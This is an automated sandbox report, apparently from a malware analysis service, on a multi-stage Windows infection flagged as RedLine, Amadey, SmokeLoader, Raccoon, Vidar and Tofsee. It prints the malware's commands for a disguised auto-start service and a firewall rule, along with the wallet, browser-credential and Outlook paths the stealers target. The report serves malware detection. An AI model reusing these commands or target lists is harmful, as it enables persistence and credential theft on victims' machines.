                          Source: 28.0.3F71.exe.fa0000.11.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 28.0.3F71.exe.400000.12.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 28.0.3F71.exe.400000.8.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Process created: C:\Users\user\Desktop\zmbGUZTICp.exe "C:\Users\user\Desktop\zmbGUZTICp.exe"
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj Process created: C:\Users\user\AppData\Roaming\gdrgbdj C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                          Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ozuqupbe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Process created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Code function: 11_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Code function: 11_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: explorer.exe, 00000002.00000000.400523398.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.368411811.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.363539607.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.362510441.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.391475166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.374968369.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.385228035.00000000083E0000.00000004.00000001.sdmp, 1E7F.exe, 00000007.00000000.462252415.0000000000C70000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.455022743.0000000000C70000.00000002.00020000.sdmp, A7F0.exe, 0000001F.00000002.660457398.00000000036D0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000002.00000000.374656651.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.362510441.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.391188066.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.362259036.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.391475166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.374968369.0000000000EE0000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.462252415.0000000000C70000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.455022743.0000000000C70000.00000002.00020000.sdmp, A7F0.exe, 0000001F.00000002.660457398.00000000036D0000.00000002.00020000.sdmp Binary or memory string: Progman
                          Source: explorer.exe, 00000002.00000000.362510441.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.391475166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.374968369.0000000000EE0000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.462252415.0000000000C70000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.455022743.0000000000C70000.00000002.00020000.sdmp, A7F0.exe, 0000001F.00000002.660457398.00000000036D0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
                          Source: explorer.exe, 00000002.00000000.362510441.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.391475166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.374968369.0000000000EE0000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.462252415.0000000000C70000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.455022743.0000000000C70000.00000002.00020000.sdmp, A7F0.exe, 0000001F.00000002.660457398.00000000036D0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe Code function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3F71.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3F71.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe Code function: 0_2_00419C99 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe Code function: 8_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe Code function: 8_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe Code function: 11_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\309C.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Modifies the Windows firewall
Source: C:\Users\user\AppData\Local\Temp\309C.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match | File source: 13.2.3F71.exe.370f910.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.3F71.exe.370f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000002.583256444.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.636412165.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.582614206.0000000003702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002E.00000002.652977998.0000000007300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.595825107.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.504088961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.503538300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000003.594002288.0000000003702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.639820143.0000000000252000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.662009828.00000000066B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000000.504557008.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.661388707.0000000003292000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: dump.pcap, type: PCAP
Yara detected Amadey's stealer DLL
Source: Yara match | File source: 0000002A.00000002.588041064.0000000000650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.625237521.0000000000780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000002.586424307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.640023554.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.562794331.0000000000650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.622790780.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.641856081.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000003.543825736.0000000000690000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.562158889.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002A.00000003.581841511.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000003.606394645.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000003.561673879.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match | File source: 1.0.zmbGUZTICp.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.gdrgbdj.6515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.1.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.zmbGUZTICp.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.zmbGUZTICp.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.zmbGUZTICp.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.408471084.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.462828818.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.392111314.0000000004151000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.462437704.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000024.00000002.645388633.0000000000712000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match | File source: 31.2.A7F0.exe.4d60e50.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.A7F0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.A7F0.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.A7F0.exe.4d60e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.3.A7F0.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.A7F0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match | File source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2DB3.exe PID: 5640, type: MEMORYSTR
Yara detected Tofsee
Source: Yara match | File source: 11.3.309C.exe.660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.3.tejjnepq.exe.650000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.ed0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.ed0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.309C.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.tejjnepq.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.309C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.309C.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.487069234.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.639945191.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.465535302.0000000000660000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.488137960.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.483029167.0000000000630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.487496290.0000000000630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.482701616.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 309C.exe PID: 5132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: tejjnepq.exe PID: 2320, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4692, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \ElectronCash\wallets\
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \Electrum\wallets\
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: window-state.json
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \jaxx\Local Storage\
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: exodus.conf.json
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: info.seco
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: ElectrumLTC
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \jaxx\Local Storage\
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: passphrase.json
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \Ethereum\
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: exodus.conf.json
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: file__0.localstorage
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: Ethereum
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: default_wallet
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: multidoge.wallet
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \Exodus\exodus.wallet\
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: seed.seco
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: keystore
Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp | String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal browser information (history, passwords, etc.)
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: Yara match | File source: 0000002E.00000002.664274182.00000000076A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.661388707.0000000003292000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 2DB3.exe PID: 5640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match | File source: 13.2.3F71.exe.370f910.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.3F71.exe.370f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.0.3F71.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000022.00000002.583256444.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
